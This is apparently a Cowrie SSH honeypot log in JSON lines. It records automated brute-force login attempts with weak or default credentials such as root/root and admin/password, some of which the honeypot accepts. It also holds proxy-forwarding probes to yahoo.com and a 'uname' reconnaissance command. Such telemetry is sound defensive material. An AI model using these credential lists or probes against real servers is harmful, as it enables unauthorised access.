{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T21:43:43.439840Z","src_ip":"46.148.229.196","session":"9c72cd74bf4a"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T21:43:43.624856Z","src_ip":"46.148.229.196","session":"9c72cd74bf4a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60170,"dst_ip":"1.2.3.4","dst_port":22,"session":"9b5a15cd043c","protocol":"ssh","message":"New connection: 212.227.125.160:60170 (1.2.3.4:22) [session: 9b5a15cd043c]","sensor":"my-vps","timestamp":"2025-08-26T21:43:43.661596Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:43:43.662400Z","src_ip":"212.227.125.160","session":"9b5a15cd043c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:43:43.711634Z","src_ip":"212.227.125.160","session":"9b5a15cd043c"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-26T21:43:43.864532Z","src_ip":"212.227.125.160","session":"9b5a15cd043c"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:43:44.663354Z","src_ip":"46.148.229.196","session":"9c72cd74bf4a"}
{"eventid":"cowrie.session.connect","src_ip":"46.148.229.196","src_port":51690,"dst_ip":"1.2.3.4","dst_port":22,"session":"b202be56f386","protocol":"ssh","message":"New connection: 46.148.229.196:51690 (1.2.3.4:22) [session: b202be56f386]","sensor":"my-vps","timestamp":"2025-08-26T21:43:44.699153Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T21:43:44.699914Z","src_ip":"46.148.229.196","session":"b202be56f386"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T21:43:44.736557Z","src_ip":"46.148.229.196","session":"b202be56f386"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T21:43:44.924298Z","src_ip":"46.148.229.196","session":"b202be56f386"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:43:44.948044Z","src_ip":"212.227.125.160","session":"9b5a15cd043c"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:43:44.961786Z","src_ip":"46.148.229.196","session":"23ca1ce864bc"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:43:44.962650Z","src_ip":"46.148.229.196","session":"b202be56f386"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55556,"dst_ip":"1.2.3.4","dst_port":22,"session":"9971cc9d7d01","protocol":"ssh","message":"New connection: 212.227.125.160:55556 (1.2.3.4:22) [session: 9971cc9d7d01]","sensor":"my-vps","timestamp":"2025-08-26T21:43:48.826679Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:43:48.854754Z","src_ip":"212.227.125.160","session":"9971cc9d7d01"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:43:48.901306Z","src_ip":"212.227.125.160","session":"9971cc9d7d01"}
{"eventid":"cowrie.login.failed","username":"steam","password":"123456","message":"login attempt [steam/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T21:43:49.230475Z","src_ip":"212.227.125.160","session":"9971cc9d7d01"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:43:50.283294Z","src_ip":"212.227.125.160","session":"9971cc9d7d01"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":57602,"dst_ip":"1.2.3.4","dst_port":22,"session":"04e68cc3e303","protocol":"ssh","message":"New connection: 213.209.150.239:57602 (1.2.3.4:22) [session: 04e68cc3e303]","sensor":"my-vps","timestamp":"2025-08-26T21:43:51.867747Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T21:43:51.868516Z","src_ip":"213.209.150.239","session":"04e68cc3e303"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T21:43:51.915667Z","src_ip":"213.209.150.239","session":"04e68cc3e303"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T21:43:52.150480Z","src_ip":"213.209.150.239","session":"04e68cc3e303"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":21616,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:21616","sensor":"my-vps","timestamp":"2025-08-26T21:43:52.199335Z","session":"04e68cc3e303"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T21:43:52.246833Z","src_ip":"213.209.150.239","session":"04e68cc3e303"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":29987,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:29987","sensor":"my-vps","timestamp":"2025-08-26T21:43:52.381529Z","session":"04e68cc3e303"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T21:43:52.428779Z","src_ip":"213.209.150.239","session":"04e68cc3e303"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:43:52.476959Z","src_ip":"213.209.150.239","session":"04e68cc3e303"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50948,"dst_ip":"1.2.3.4","dst_port":22,"session":"8f16170a4d34","protocol":"ssh","message":"New connection: 212.227.125.160:50948 (1.2.3.4:22) [session: 8f16170a4d34]","sensor":"my-vps","timestamp":"2025-08-26T21:43:54.859457Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:43:54.860240Z","src_ip":"212.227.125.160","session":"8f16170a4d34"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:43:54.905137Z","src_ip":"212.227.125.160","session":"8f16170a4d34"}
{"eventid":"cowrie.login.failed","username":"admin","password":"password","message":"login attempt [admin/password] failed","sensor":"my-vps","timestamp":"2025-08-26T21:43:55.042453Z","src_ip":"212.227.125.160","session":"8f16170a4d34"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:43:56.103080Z","src_ip":"212.227.125.160","session":"8f16170a4d34"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46332,"dst_ip":"1.2.3.4","dst_port":22,"session":"a947d14f37a2","protocol":"ssh","message":"New connection: 212.227.125.160:46332 (1.2.3.4:22) [session: a947d14f37a2]","sensor":"my-vps","timestamp":"2025-08-26T21:44:00.175144Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:44:00.200063Z","src_ip":"212.227.125.160","session":"a947d14f37a2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:44:00.229635Z","src_ip":"212.227.125.160","session":"a947d14f37a2"}
{"eventid":"cowrie.login.failed","username":"lscpd","password":"lscpd","message":"login attempt [lscpd/lscpd] failed","sensor":"my-vps","timestamp":"2025-08-26T21:44:00.524540Z","src_ip":"212.227.125.160","session":"a947d14f37a2"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:44:01.608609Z","src_ip":"212.227.125.160","session":"a947d14f37a2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":18298,"dst_ip":"1.2.3.4","dst_port":22,"session":"d2b86d07980d","protocol":"ssh","message":"New connection: 212.227.125.160:18298 (1.2.3.4:22) [session: d2b86d07980d]","sensor":"my-vps","timestamp":"2025-08-26T21:44:01.701886Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:44:01.703132Z","src_ip":"212.227.125.160","session":"d2b86d07980d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":18561,"dst_ip":"1.2.3.4","dst_port":22,"session":"c648e53bf4a0","protocol":"ssh","message":"New connection: 212.227.125.160:18561 (1.2.3.4:22) [session: c648e53bf4a0]","sensor":"my-vps","timestamp":"2025-08-26T21:44:01.814318Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:44:01.815169Z","src_ip":"212.227.125.160","session":"c648e53bf4a0"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-26T21:44:01.930468Z","src_ip":"212.227.125.160","session":"c648e53bf4a0"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T21:44:02.277414Z","src_ip":"212.227.125.160","session":"c648e53bf4a0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-26T21:44:02.392846Z","session":"c648e53bf4a0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41716,"dst_ip":"1.2.3.4","dst_port":22,"session":"7c4dac1adb21","protocol":"ssh","message":"New connection: 212.227.125.160:41716 (1.2.3.4:22) [session: 7c4dac1adb21]","sensor":"my-vps","timestamp":"2025-08-26T21:44:06.454149Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:44:06.454994Z","src_ip":"212.227.125.160","session":"7c4dac1adb21"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:44:06.498751Z","src_ip":"212.227.125.160","session":"7c4dac1adb21"}
{"eventid":"cowrie.login.success","username":"root","password":"qq123456","message":"login attempt [root/qq123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T21:44:06.631900Z","src_ip":"212.227.125.160","session":"7c4dac1adb21"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T21:44:06.779364Z","src_ip":"212.227.125.160","session":"7c4dac1adb21"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T21:44:06.780037Z","src_ip":"212.227.125.160","session":"7c4dac1adb21"}
